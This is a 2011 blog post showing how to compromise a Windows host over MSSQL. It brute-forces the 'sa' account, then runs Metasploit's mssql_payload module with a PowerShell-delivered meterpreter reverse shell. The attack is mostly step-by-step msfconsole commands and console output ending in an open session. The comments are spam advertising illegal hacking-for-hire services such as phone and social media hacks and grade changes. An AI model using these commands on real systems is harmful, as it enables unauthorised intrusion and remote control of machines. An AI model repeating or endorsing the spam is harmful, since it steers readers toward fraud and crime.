Monday, May 16, 2011
Attacking Windows Operating System Over PowerShell | Done Using Metasploit.
Do you like this story?
You May already Know the PowerShell security policies and protection measures that are used by Microsoft, as a reminder there are 4 levels of execution policies that can help in securing different script execution.
Now that post has been mostly focused on system security administrator benefit but what about hackers, do they have benefits for PowerShell usage for compromising remote systems? Can a hacker bypass the existing execution policies to run malicious scripts?
On Defcon18 there has been an interesting presentation called PowerShell …omfg (by David Kennedy (ReL1K) and Josh Kelley (Winfang)) 
the demo has showed how Windows PowerShell enable users to perform almost any task we want. while a new attack vector through Powershell has been released to allow users to deliver whatever payload they want to through Powershell in both a bind and reverse type scenario and drop any executable.
the demo has showed how Windows PowerShell enable users to perform almost any task we want. while a new attack vector through Powershell has been released to allow users to deliver whatever payload they want to through Powershell in both a bind and reverse type scenario and drop any executable.Now if you are on a penetration testing mission you start by running nmap searching for the live windows hosts on the network basically with 1433 active port (Mssql). You launch brute force attack on the “sa” account which is the system administrator account for MSSQL. When using “Mixed Mode” or “SQL Authentication”, the SQL “sa” account automatically gets created. Administrators have to enter a password when creating these accounts and often leave these as weak passwords.
After you open metasploit with the latest update that includes Metsploit PowerShell Debug.
$ msfconsole
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > show payloads
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST [Your IP]
msf exploit(mssql_payload) > set RHOST [TARGET IP]
msf exploit(mssql_payload) > set UsePowershell true (this will make you use PowerShell for the payload conversion on Server 2008 and Windows 7)
msf exploit(mssql_payload) > set UseCmdStager false
msf exploit (mssql_payload) > exploit
On the console metasploit will display the following:
[*] Started bind handler.[*] Warning: This module will leave gjMKcfst.exe in the SQL Server %TEMP% directory
[*] Uploading the payload utilizing PowerShell EncodedCommand…
[*] Executing the payload…
[*] Uploading the payload utilizing PowerShell EncodedCommand…
[*] Executing the payload…
[*] Sending stage (748032 bytes) to [TARGET IP]
[*] Be sure to cleanup gjMKcfst.exe…
[*] Be sure to cleanup gjMKcfst.exe…
[*] Meterpreter session 1 opened (10.X.X.X:4444 -> 10.X.X.X:1030)
meterpreter >
The demonstrated attack may run on windows 2008 R2 /windows Se7en or any windows operating system that have a powershell installed. A penetration tester will bypass all restriction policies on windows and execute the payload on the system to get the meterpreter shell. It is clear that relying totally on the execution security policy are not a good solution as a malicious user may bypass all security measures on PowerShell.
Post Your Comments...
This post was written by: Ashif Ismail
Ashif Ismail is a professional blogger, Software Programmer and front end web developer. Follow him on Twitter
Subscribe to:
Post Comments (Atom)
2 Responses to “Attacking Windows Operating System Over PowerShell | Done Using Metasploit.”
May 28, 2020 at 10:36 AM
This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:
-Phone hacks (remotely)
-Credit repair
-Bitcoin recovery (any cryptocurrency)
-Make money from home (USA only)
-Social media hacks
-Website hacks
-Erase criminal records (USA & Canada only)
-Grade change
Email: onlineghosthacker247@ gmail .com
January 4, 2021 at 5:23 PM
Hello everyone I want to introduce you guys to a group a private investigators who can help you with information you need in any situation in life and they are ready to follow you step by step until your case is cleared just contact +17078685071 and you will happily ever after
Premiumhackservices@gmail.com
Post a Comment